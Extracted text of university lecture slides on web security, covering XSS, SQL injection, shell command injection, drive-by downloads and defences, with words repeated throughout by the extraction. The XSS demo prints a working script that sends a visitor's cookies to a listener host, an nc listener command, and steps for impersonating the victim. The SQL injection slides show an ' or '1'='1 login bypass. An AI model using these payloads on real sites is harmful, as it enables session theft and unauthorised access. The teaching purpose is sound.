Auditing Web Auditing Web SecuritySecurity

ObjectivesObjectives

Understand the complexity of Understand the complexity of Web infrastructure and current Web infrastructure and current trends of Web threattrends of Web threat

Understand the mechanisms and Understand the mechanisms and defense of major Web attacks: defense of major Web attacks: XSS, SQL injection and shell XSS, SQL injection and shell attacksattacks

Why Web Security: Why Web Security: a Real Business a Real Business ProblemProblem

> 60% of total attack attempts > 60% of total attack attempts observed on the Net are against observed on the Net are against Web applicationsWeb applications

> 80% of vulnerabilities discovered > 80% of vulnerabilities discovered are in web appsare in web apps

Independent security auditIndependent security audit Regulatory complianceRegulatory compliance

Anatomy of Web Anatomy of Web AttacksAttacks

1.1. Attacker breaks into a legitimate website and posts Attacker breaks into a legitimate website and posts malwaremalware• Malware is no longer exclusive to malicious Web sites.Malware is no longer exclusive to malicious Web sites.

2.2. Attacking end-user machines.Attacking end-user machines.• Malware on a Web site makes its way down on to a Malware on a Web site makes its way down on to a

user’s machine when that user visits the host Web site. user’s machine when that user visits the host Web site. • ““Drive-by-download” – happens automatically with no Drive-by-download” – happens automatically with no

user interaction required user interaction required • Additional techniques which do require some input from Additional techniques which do require some input from

the user, but in practice are equally, if not more so, the user, but in practice are equally, if not more so, effective.effective.

3.3. Leveraging end user machines for malicious activity. Leveraging end user machines for malicious activity.

Anatomy of Web Anatomy of Web AttacksAttacks

Source: Web Based Attacks, Symantec 2009Source: Web Based Attacks, Symantec 2009

Big trend: software as a (Web-based) Big trend: software as a (Web-based) serviceservice– Online banking, shopping, government, etc.Online banking, shopping, government, etc.– Cloud computingCloud computing

Applications hosted on Web serversApplications hosted on Web servers– Written in a mixture of PHP, Java, Perl, Python, Written in a mixture of PHP, Java, Perl, Python,

C, ASPC, ASP Security is rarely the main concernSecurity is rarely the main concern

– Poorly written scripts with inadequate input Poorly written scripts with inadequate input validationvalidation

– Sensitive data stored in world-readable filesSensitive data stored in world-readable files

Web ApplicationsWeb Applications

Runs on a Web server or application serverRuns on a Web server or application server Takes input from Web users (via Web server)Takes input from Web users (via Web server) Interacts with back-end databases and third Interacts with back-end databases and third

partiesparties Prepares and outputs results for users (via Web Prepares and outputs results for users (via Web

server)server)– Dynamically generated HTML pagesDynamically generated HTML pages– Contain content from many different sources, often Contain content from many different sources, often

including regular usersincluding regular users Blogs, social networks, photo-sharing websites…Blogs, social networks, photo-sharing websites… Web advertisements, usually third partyWeb advertisements, usually third party

– A webpage can have content coming from 10-20 A webpage can have content coming from 10-20 different domainsdifferent domains

Typical Web Application Typical Web Application DesignDesign

Two Sides of Web Two Sides of Web SecuritySecurity

Web browser (front end)Web browser (front end)– Can be attacked by any website it visitsCan be attacked by any website it visits– Attacks lead to malware installation (keyloggers, Attacks lead to malware installation (keyloggers,

botnets), document theft, loss of private databotnets), document theft, loss of private data Web application (back end)Web application (back end)

– Runs at websiteRuns at website Banks, online merchants, blogs, Google Apps, etc.Banks, online merchants, blogs, Google Apps, etc.

– Written in Javascript, PHP, ASP, JSP, Ruby, …Written in Javascript, PHP, ASP, JSP, Ruby, …– Many potential bugs: XSS, SQL injection, XSRFMany potential bugs: XSS, SQL injection, XSRF– Attacks lead to stolen credit cards, defaced sites, Attacks lead to stolen credit cards, defaced sites,

etc.etc.

Chicago Tribune Home PageChicago Tribune Home Page

How Are Legitimate Web How Are Legitimate Web Sites Compromised?Sites Compromised?

1.1. SQL Injection AttacksSQL Injection Attacks2.2. Malicious AdvertisementsMalicious Advertisements

– Many Web sites today display advertisements Many Web sites today display advertisements hosted by third-party advertising siteshosted by third-party advertising sites

– Volume of ads published automatically makes Volume of ads published automatically makes detection difficultdetection difficult

– Random appearances further compounds the Random appearances further compounds the detectiondetection

3.3. Search Engine Result RedirectionSearch Engine Result Redirection4.4. Attacks on the backend virtual hosting Attacks on the backend virtual hosting

companiescompanies5.5. Cross-site scripting (XSS) attacksCross-site scripting (XSS) attacks6.6. Vulnerabilities in the Web server or forum Vulnerabilities in the Web server or forum

hosting software (e.g., shell attacks)hosting software (e.g., shell attacks)

slide slide 1212

JavaScriptJavaScript Language executed by browserLanguage executed by browser

– Scripts are embedded in Web pagesScripts are embedded in Web pages– Can run before HTML is loaded, before page is Can run before HTML is loaded, before page is

viewed, while it is being viewed or when leaving viewed, while it is being viewed or when leaving the pagethe page

Used to implement “active” web pagesUsed to implement “active” web pages– AJAX, huge number of Web-based applicationsAJAX, huge number of Web-based applications

Many security and correctness issuesMany security and correctness issues– Attacker gets to execute some code on user’s Attacker gets to execute some code on user’s

machinemachine– Often used to exploit other vulnerabilitiesOften used to exploit other vulnerabilities

Cross Site ScriptingCross Site Scripting

Attacker goal: their code into Attacker goal: their code into browserbrowser

XSS forces a website visitor to XSS forces a website visitor to execute malicious code in his/her execute malicious code in his/her browserbrowser

Count for roughly 80% of all Count for roughly 80% of all documented security documented security vulnerabilitiesvulnerabilities

XSS RisksXSS Risks

XSS abuses render engines or XSS abuses render engines or plug-insplug-ins

Steal browser cookiesSteal browser cookies Steal session info for replay Steal session info for replay

attackattack Malware or bot installationMalware or bot installation Redirect or phishing attemptRedirect or phishing attempt

XSS Example 1XSS Example 1 Trudy posts the following JavaScript on a Trudy posts the following JavaScript on a

message board:message board: <script language="javascript"> <script language="javascript">

var url = var url = "http://machineaddress:5000/index.html?"http://machineaddress:5000/index.html?cookie=“+ encodeURI(document.cookie); cookie=“+ encodeURI(document.cookie); </script> </script>

Then run a TCP server listening on port Then run a TCP server listening on port 5000 with e.g., nc –l 50005000 with e.g., nc –l 5000

When Bob views the posted message, his When Bob views the posted message, his browser executes the malicious script, and browser executes the malicious script, and his session cookie is sent to Trudyhis session cookie is sent to Trudy

XSS Demo InstructionsXSS Demo Instructions Set port forward to bypass the firewallSet port forward to bypass the firewall

ssh -L 8000:netsec-demos:2000 ssh -L 8000:netsec-demos:2000 guest@netsec-1.cs.northwestern.edu guest@netsec-1.cs.northwestern.edu

Note: 8000 is the local port, it's forwarded to Note: 8000 is the local port, it's forwarded to netsec-demos port 2000 through netsec-1netsec-demos port 2000 through netsec-1

Use http://localhost:8000 to access Use http://localhost:8000 to access http://netsec-http://netsec-demos.cs.northwestern.edu:2000 demos.cs.northwestern.edu:2000

XSS Demo Instructions XSS Demo Instructions (II)(II)

Login as ychen and post the script with a Login as ychen and post the script with a sexy title (e.g., hot game!)sexy title (e.g., hot game!)

<script language="javascript"><script language="javascript">

var url = "http://cal.cs.northwestern.edu:5000/index.html?cookie=";var url = "http://cal.cs.northwestern.edu:5000/index.html?cookie=";

url = url + encodeURI(document.cookie);url = url + encodeURI(document.cookie);

new Image().src=url;new Image().src=url;

</script></script>

Hi Everyone! Thanks for your cookies!Hi Everyone! Thanks for your cookies!

Ssh to that machine (e.g., Ssh to that machine (e.g., cal.cs.northwestern.edu) and runcal.cs.northwestern.edu) and run

nc –l 5000 nc –l 5000

Simple XSS CodeSimple XSS Codevar url = var url =

"http://machineaddress:5000/index.html?"http://machineaddress:5000/index.html?cookie=“+ encodeURI(document.cookie);cookie=“+ encodeURI(document.cookie);

document.cookie is the browser's entire document.cookie is the browser's entire cookie for the current website cookie for the current website

encodeURI() is a javascript function to encodeURI() is a javascript function to hex-encode certain characters to be hex-encode certain characters to be included as part of a URLincluded as part of a URL– E.g., changing the space character to %20E.g., changing the space character to %20– Make the URL less suspiciousMake the URL less suspicious

What can Attacker Do What can Attacker Do with the Cookie?with the Cookie?

Another user test458 login as and when Another user test458 login as and when clicking the post, cookie is sent to the attackerclicking the post, cookie is sent to the attacker

Crack Bob’s password (MD5 hash in the cookie) Crack Bob’s password (MD5 hash in the cookie) with John the Ripper, Hydra, or any password with John the Ripper, Hydra, or any password crackercracker

For more info, For more info, http://netsec.cs.northwestern.edu/resources/password-http://netsec.cs.northwestern.edu/resources/password-cracking/cracking/

Use a Firefox plugin like Tamperdata to reset Use a Firefox plugin like Tamperdata to reset your cookies to impersonate Bobyour cookies to impersonate Bob

XSS DetectionXSS Detection A client usually is not supposed to send A client usually is not supposed to send

scripts to serversscripts to servers If the server receives <SCRIPT>… or the If the server receives <SCRIPT>… or the

hex equivalent in an incoming packet and hex equivalent in an incoming packet and that same script is sent unsanitized in an that same script is sent unsanitized in an outgoing packet, then an attack has outgoing packet, then an attack has occurredoccurred– A sanitized script could look like &ls;SCRIPT&gt;A sanitized script could look like &ls;SCRIPT&gt;

…… Any user input Any user input mustmust be preprocessed be preprocessed

before it is used inside HTMLbefore it is used inside HTML

SQL InjectionSQL Injection

Malicious SQL statements run on a Malicious SQL statements run on a database and thus attack the serverdatabase and thus attack the server

– XSS can only target other usersXSS can only target other users

SQL Injection ExampleSQL Injection Example Trudy accesses Bob’s website; in which he does not Trudy accesses Bob’s website; in which he does not

validate input on his sign in formvalidate input on his sign in form– Runs a SQL statement like the following:Runs a SQL statement like the following:– select username, user_password from select username, user_password from

minibbtable_users where user_password = minibbtable_users where user_password = md5('johnspassword') and username='johndoe’; md5('johnspassword') and username='johndoe’;

Set username to ' or '1'='1 Set username to ' or '1'='1 select username, user_password from select username, user_password from

minibbtable_users where user_password = minibbtable_users where user_password = md5('anyrandompassword') and username='' or md5('anyrandompassword') and username='' or '1'='1’; '1'='1’;

Effect: picks any row where the username is blank Effect: picks any row where the username is blank and the password matches or any row where true.and the password matches or any row where true.

Add “limit 1” to pick the first rowAdd “limit 1” to pick the first row

SQL Injection SQL Injection DetectionDetection

Input validation on any outgoing SQL Input validation on any outgoing SQL statements from the web server to the statements from the web server to the database serverdatabase server– FilterFilter

Apostrophes, semicolons, percent symbols, hyphens, Apostrophes, semicolons, percent symbols, hyphens, underscores, …underscores, …

Any character that has special meanings must be Any character that has special meanings must be escaped, .e.g., convert ’ into \’escaped, .e.g., convert ’ into \’

– Only works for string inputsOnly works for string inputs– Different databases have different rules for escapingDifferent databases have different rules for escaping

– Check the data type (e.g., make sure it’s an Check the data type (e.g., make sure it’s an integer)integer)

Shell AttacksShell Attacks

Control an actual machine like Control an actual machine like a web servera web server

Shell AttacksShell Attacks

Inject commands into scripts that Inject commands into scripts that use Linux utilitiesuse Linux utilities– E.g., with “;” as command separator in E.g., with “;” as command separator in

UNIX/LINUXUNIX/LINUX CGI programs like perl can use CGI programs like perl can use

command-line programs (e.g. grep, command-line programs (e.g. grep, ls)ls)

Unsanitized input as arguments Unsanitized input as arguments can lead to command execution.can lead to command execution.

Defense ApproachesDefense Approaches

Web firewall/IDSWeb firewall/IDS– ModSecurity for ApacheModSecurity for Apache– Commercial: SecureSphere from ImpervaCommercial: SecureSphere from Imperva

Static code analysisStatic code analysis– Open source: NiktoOpen source: Nikto– Commercial: Commercial:

Acutenix Web Vulnerability ScannerAcutenix Web Vulnerability Scanner N-stalkerN-stalker

Education on good codingEducation on good coding– HTML encoding on input (server-side)HTML encoding on input (server-side)– Input validation/filteringInput validation/filtering

GETTING ONTO A USER’S COMPUTER GETTING ONTO A USER’S COMPUTER

Source: Web Based Attacks, Symantec 2009Source: Web Based Attacks, Symantec 2009

Automatic Attack Automatic Attack ExposureExposure

Techniques used to deliver Techniques used to deliver malware from Websites to a users malware from Websites to a users computer.computer.

ExposureExposure– Browsing a websiteBrowsing a website– No user interaction is requiredNo user interaction is required– Executable content is automatically Executable content is automatically

downloadeddownloaded

Social EngineeringSocial Engineering

Source: Web Based Attacks, Symantec 2009Source: Web Based Attacks, Symantec 2009

• People are tricked into performing actions they would not otherwise want to perform

Types of Social Types of Social Engineering AttacksEngineering Attacks Fake CodecFake Codec Malicious Peer-to-Peer (P2P) FilesMalicious Peer-to-Peer (P2P) Files Malicious AdvertisementsMalicious Advertisements Fake Scanner Web PageFake Scanner Web Page Blog SpamBlog Spam Other Attack VectorsOther Attack Vectors

Fake CodecFake Codec

User is prompted to install a missing User is prompted to install a missing codeccodec

Codec is actually malware codeCodec is actually malware code– Usually a trojan horseUsually a trojan horse

Malicious Peer-to-Peer Malicious Peer-to-Peer (P2P) Files(P2P) Files Malware authors bind content into popular Malware authors bind content into popular

applicationsapplications– Files named after celebrities, popular Files named after celebrities, popular

bandsbands– Uploaded to popular P2P sites where they Uploaded to popular P2P sites where they

are downloaded by unsuspecting usersare downloaded by unsuspecting users Openly available how-to materials on the Openly available how-to materials on the

internetinternet– Details how to build and distribute Details how to build and distribute

malwaremalware– Pay-Per-Install malwarePay-Per-Install malware

Fake Scanner Web Fake Scanner Web PagePage

Create a web site or product Create a web site or product that misrepresents the truththat misrepresents the truth– JavaScript pop-ups notifying of JavaScript pop-ups notifying of

false need to install operating false need to install operating system updatessystem updates

Source: Web Based Attacks, Symantec 2009

–Tools that claim to scan for and remove adult images, etc.

Blog SpamBlog Spam

Alluring links posted on blogs Alluring links posted on blogs – Links embedded in blog commentsLinks embedded in blog comments– Direct users to sites that leverage Direct users to sites that leverage

social engineering tricks or browser social engineering tricks or browser exploits to spread malwareexploits to spread malware

Other Attack VectorsOther Attack Vectors

SpamSpam– Emails contain links directing people Emails contain links directing people

to drive by download, fake to drive by download, fake scanner/codec, and malware sitesscanner/codec, and malware sites

Pirated software sitesPirated software sites– Pirated versions of software are Pirated versions of software are

bundled with or comprised solely of bundled with or comprised solely of trojan horsestrojan horses

Other Attack VectorsOther Attack Vectors

What is buffer overflow?What is buffer overflow? Hackers typically break into a remote system by Hackers typically break into a remote system by

exploiting some exploiting some vulnerabilityvulnerability of its software --- a of its software --- a programming or configuration bug that makes it programming or configuration bug that makes it possible to subvert the software and have it execute possible to subvert the software and have it execute unplanned instructions.unplanned instructions.

buffer overflow occurs anytime the program writes buffer overflow occurs anytime the program writes more information into the buffer than the space it has more information into the buffer than the space it has allocated in the memory. This allows an attacker to allocated in the memory. This allows an attacker to overwrite data that controls the program execution overwrite data that controls the program execution path and hijack the control of the program to execute path and hijack the control of the program to execute the attacker’s code instead the process code.the attacker’s code instead the process code.

How to Protect How to Protect YourselfYourself

Update and Patch SoftwareUpdate and Patch Software– Get latest OS, Browser, Application patchesGet latest OS, Browser, Application patches– Browswer Plug-in updates often forgottenBrowswer Plug-in updates often forgotten

Endpoint Protection SoftwareEndpoint Protection Software– Anti-virus software for signature based detection Anti-virus software for signature based detection

and behavioral monitoringand behavioral monitoring– Update Protection Software SubscriptionUpdate Protection Software Subscription

Could miss 70,000 new unique virus variants for one weekCould miss 70,000 new unique virus variants for one week Be SuspiciousBe Suspicious

– Avoid things that seem too good to be trueAvoid things that seem too good to be true– Use safe search functionality in browsersUse safe search functionality in browsers

Adopt Strong Password PolicyAdopt Strong Password Policy